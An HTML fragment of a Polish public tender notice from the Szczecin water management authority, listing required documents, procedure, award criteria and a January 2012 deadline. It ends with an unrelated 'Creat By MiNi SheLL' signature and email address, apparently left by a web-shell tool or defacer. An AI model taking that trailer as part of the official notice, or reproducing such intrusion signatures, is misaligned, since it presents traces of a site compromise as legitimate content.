<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  Ofertę cenową 
     2)  Odpowiednie pełnomocnictwa;  
     3)   Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szczecin.rzgw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalny Zarząd Gospodarki Wodnej w Szczecinie, ul. Tama Pomorzańska 13A, 70-030 Szczecin,
     Zespół ds. zamówień pok. nr 128..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2012 godzina 09:00, miejsce: Regionalny Zarząd Gospodarki Wodnej w Szczecinie, ul. Tama Pomorzańska 13A, 70-030 Szczecin,
     Zespół ds. zamówień pok. nr 128..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com